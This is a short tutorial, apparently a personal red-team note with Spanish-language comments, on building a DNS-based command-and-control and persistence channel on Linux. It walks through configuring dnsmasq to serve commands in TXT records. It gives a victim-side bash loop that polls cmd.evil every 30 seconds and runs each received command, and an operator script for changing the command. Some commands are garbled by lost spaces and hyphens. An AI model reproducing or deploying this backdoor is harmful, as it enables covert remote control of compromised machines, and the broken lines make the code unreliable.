DNS as a channel for persistence and C2 (Linux)
Description
This technique uses DNS queries to communicate with a remote server. The compromised system periodically queries a domain for TXT records, which contain encoded commands. After executing the command locally, the system may send results back via DNS or another channel. This method is stealthy because DNS traffic is often overlooked and considered benign
Steps
- Install dnsmasq
- Create a file to simulate commands via DNS
- Edit dnsmasq.conf temporary
- Add
- Reboot dnsmasq
- On the victim: Script to obtain command via DNS
- Now on our machine, we create a file
- We can choose the command we want to execute
sudo apt install dnsmasq
sudo mkdir-p /var/lib/dns-c2 echo "whoami" > /var/lib/dns-c2/cmd.txt
sudo nano /etc/dnsmasq.d/dns-c2.conf
address=/cmd.evil/127.0.0.1 txt-record=cmd.evil,"$(cat /var/lib/dns-c2/cmd.txt)"
sudo systemctl restart dnsmasq
#!/bin/bash while true; do cmd=$(dig +short TXT cmd.evil @192.168.11.129 | sed 's/"//g') if [[ !-z "$cmd" ]]; then echo "[*] Ejecutando comando recibido: $cmd" bash-c "$cmd" fi sleep 30 done
#!/bin/bash
# Verificar que se pase al menos un parámetro (el
comando)
if [-z "$1" ]; then
echo "Uso: $0 'comando' [ruta_adicional]"
exit 1
fi
COMANDO="$1"
RUTA1="/var/lib/dns-c2/cmd.txt"
RUTA2="$2"
dns
# Escribir comando en la ruta1
echo "$COMANDO" | sudo tee "$RUTA1" > /dev/null
# Si se pasa ruta2, también escribir el comando ahí
if [ !-z "$RUTA2" ]; then
echo "$COMANDO" | sudo tee "$RUTA2" > /dev/null
fi
# Actualizar dnsmasq dinámicamente con el comando desde
la ruta1
echo "address=/cmd.evil/127.0.0.1" | sudo tee
/etc/dnsmasq.d/cmd.conf > /dev/null
echo "txt-record=cmd.evil,\"$(cat $RUTA1)\"" | sudo tee
a /etc/dnsmasq.d/cmd.conf > /dev/null
# Reiniciar dnsmasq
sudo systemctl restart dnsmasq
echo "Comando actualizado en $RUTA1${RUTA2:+ y $RUTA2} y
dnsmasq reiniciado."
sudo ./dns-command.sh "uname -a"
Reference: Created by Luis Rivera